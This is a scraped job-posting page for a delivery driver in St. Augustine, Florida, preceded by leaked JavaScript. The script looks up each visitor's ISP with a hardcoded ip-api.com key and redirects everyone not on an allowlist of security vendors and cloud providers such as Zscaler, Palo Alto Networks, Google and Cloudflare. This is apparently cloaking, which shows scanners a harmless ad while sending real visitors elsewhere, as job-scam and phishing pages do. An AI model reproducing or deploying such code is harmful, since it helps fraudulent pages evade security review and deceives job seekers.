Delivery Driver
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Delivery Driver in St. Augustine, Florida, and enjoy flexible hours delivering food to customers in your community.
- Safely and efficiently deliver food orders to customers using a personal vehicle.
- Maintain a professional and friendly attitude while interacting with customers.
- Follow traffic laws and safety procedures to ensure timely deliveries.
- Manage delivery routes and communicate effectively with support teams as needed.
- Handle transactions and collect payments when required.
**Skills Needed:**
- Valid driver’s license and reliable vehicle.
- Good navigation skills and familiarity with the local area.
- Strong time management and organization skills.
- Excellent customer service and communication skills.
- Ability to work independently and handle multiple deliveries efficiently.
**Benefits:**
- Flexible scheduling to fit your lifestyle.
- Competitive earning potential with tips and incentives.
- Opportunity to work in a dynamic and supportive environment.
- Potential for growth and advancement.